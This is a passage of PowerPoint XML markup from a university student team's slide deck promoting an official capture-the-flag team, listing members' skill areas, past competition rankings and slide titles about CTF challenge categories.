              <a:t> – Steganography, OSINT, Forensics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Diptendu – Crypto, Steganography, Web (a bit)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err="1"/>
              <a:t>Subhojeet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> – Reversing and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Pwning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Jordan – Networking, Password cracking, OSINT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Strategy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Divide and conquer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Try to solve challenges in respective area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If all challenges are done OR challenge too difficult, move to other category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Help others – coding, brainstorming</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="187119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640A4-3866-4418-A9B9-CAC1438BD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Our journey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0954F-61A6-4105-8B67-C35146670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dirty="0" err="1"/>
              <a:t>CyberBioSecurity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Hackathon – 3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0"/>
              <a:t>rd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. First place – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Kryptsec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>CyberSeed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> 2019 – 18 / 57.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RITSEC – 64 / 900. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Kryptsec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – 176 / 900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 TUCTF – 106 / 1005.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HACKTM CTF QUALS – one challenge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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>NullCON</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> – one challenge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22C270-9A6A-4500-9A4A-73B257498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120" y="1712884"/>
            <a:ext cx="9580879" cy="4614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3E064E-779E-4271-8E80-4D8685BE0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618" y="1737360"/>
            <a:ext cx="9695382" cy="4556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10C40A-6A58-4361-A545-566E5E796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2026" y="2072639"/>
            <a:ext cx="9669974" cy="366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3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D5960-3166-4D3E-8289-2C220DCAE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then…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78ADFE-73F9-4461-B0CC-44FF3A3BE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6963" y="2397535"/>
            <a:ext cx="10058400" cy="2920180"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom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07F25640-0553-4C57-BBCB-208370F9F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280" y="1760220"/>
            <a:ext cx="9062720" cy="509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55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1058</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>153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Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Georgia</vt:lpstr>
      <vt:lpstr>Helvetica Neue</vt:lpstr>
      <vt:lpstr>Menlo</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Retrospect</vt:lpstr>
      <vt:lpstr>Towards an official CTF Team of CSU</vt:lpstr>
      <vt:lpstr>About US</vt:lpstr>
      <vt:lpstr>What is a CTF?</vt:lpstr>
      <vt:lpstr>What’s in it for you?</vt:lpstr>
      <vt:lpstr>CTF Types and Categories</vt:lpstr>
      <vt:lpstr>CTF Types and Categories</vt:lpstr>
      <vt:lpstr>Our skills (we think so) and strategy</vt:lpstr>
      <vt:lpstr>Our journey so far</vt:lpstr>
      <vt:lpstr>And then…</vt:lpstr>
      <vt:lpstr>Other teams</vt:lpstr>
      <vt:lpstr>Enough talk… Lets see some challenges</vt:lpstr>
      <vt:lpstr>Crypto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Misc.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Networking</vt:lpstr>
      <vt:lpstr>Misc: breaking zip file encryption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 the pcap</vt:lpstr>
      <vt:lpstr>I wonder what my hotel neighbor is doing…</vt:lpstr>
      <vt:lpstr>Challenge</vt:lpstr>
      <vt:lpstr>Congrats</vt:lpstr>
      <vt:lpstr>Reversing - Live</vt:lpstr>
      <vt:lpstr>Join US</vt:lpstr>
      <vt:lpstr>Mail: vitaming@cs.colostate.edu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an official CTF Team of CSU</dc:title>
  <dc:creator>Diptendu Kar</dc:creator>
  <cp:lastModifiedBy>Diptendu Kar</cp:lastModifiedBy>
  <cp:revision>6</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-02-25T22:20:20Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-02-26T05:05:43Z</dcterms:modified>
</cp:coreProperties>
</file>